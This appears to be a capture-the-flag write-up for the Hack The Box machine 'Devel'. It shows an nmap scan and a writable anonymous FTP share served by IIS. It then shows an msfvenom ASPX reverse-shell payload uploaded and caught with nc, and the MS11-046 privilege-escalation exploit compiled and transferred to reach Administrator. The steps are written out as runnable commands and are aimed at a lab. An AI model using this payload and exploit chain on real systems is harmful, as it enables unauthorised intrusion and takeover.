Devel — HTB
IP :- 10.10.10.5
NMAP
nmap -v -A -sC -oN nmap 10.10.10.5PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17 01:06AM <DIR> aspnet_client
| 12-06-19 06:13PM 1442 cmdasp.aspx
| 03-17-17 04:37PM 689 iisstart.htm
| 12-06-19 06:09PM 6 test.txt
|_03-17-17 04:37PM 184946 welcome.png
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Nmap has also told that anonymous login allowed for ftp server
after visiting ftp we can see that we are have permission to write on ftp server
we see that there are some files at ftp , now let’s see is this directory is shared on web?
ftp files are accessible from web
Great, so it looks like we can upload files to the server. Let’s generate an ASPX reverse shell using msfvenom and upload that.
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.4 LPORT=4444 -f aspx > shell.aspx
as the reverse shell is generated, let’s upload it.
ftp> put shell.aspx
local: shell.aspx remote: shell.aspx
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
1442 bytes sent in 0.00 secs (985.4465 kB/s)
We can now access this file via the browser.
as we had given LPORT 4444 in payload for reverse shell
start nc on port 4444 using
nc -lvp 4444
now it’s time to call our shell.apsx for getting shell
http://10.10.10.5/shell1.aspx ( call from your browser )
now we get shell at our nc
we are just a iis user we are not having permission to visit on other users folders
so we have to do privilege escalation
we used systeminfo command for the system information
c:\Users>systeminfo
systeminfo
Host Name: DEVEL
OS Name: Microsoft Windows 7 Enterprise
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: babis
Registered Organization:
Product ID: 55041-051-0948536-86302
Original Install Date: 17/3/2017, 4:17:31
System Boot Time: 25/2/2019, 12:29:12
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: X86-based PC
Processor(s): 1 Processor(s) Installed.
[01]: x64 Family 6 Model 63 Stepping 2 GenuineIntel ~2300 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 5/4/2016
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: el;Greek
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 1.024 MB
Available Physical Memory: 754 MB
Virtual Memory: Max Size: 2.048 MB
Virtual Memory: Available: 1.521 MB
Virtual Memory: In Use: 527 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.5
we got OS Version :- 6.1.7600 n/a build 7600
let’s see if this version is vulnerable to privilege escalation
we got the exploit for exploitdb
we downloaded and compiled it from this is the command
i686-w64-mingw32-gcc 40564.c -o MS11-046.exe -lws2_32
and we got the compiled MS11–046.exe now the main work is to transfer it to victim machine for privilege escalation
remember we are having write permission to ftp again sending file with ftp
after this upload the shell.exe file to the machine. Use the FTP server in binary mode for the transfer.
ftp> binary
200 Type set to I.
ftp> put MS11–046.exe
local: MS11–046.exe remote: MS11–046.exe
200 PORT command successful.
we now move to c:\inetpub\wwwroot and there we got our MS11–046
now we just had to run
now we are having administrator power
and we can visit to any users profile/directory
got root at
C:\Users\Administrator\Desktop\type root.txt.txt
e621a0b50************728bc72b4b
got user at
C:\Users\babis\Desktop\type user.txt.txt
9ecdd6a3a************ea70f4cb3e8
THANKYOU!!!!!!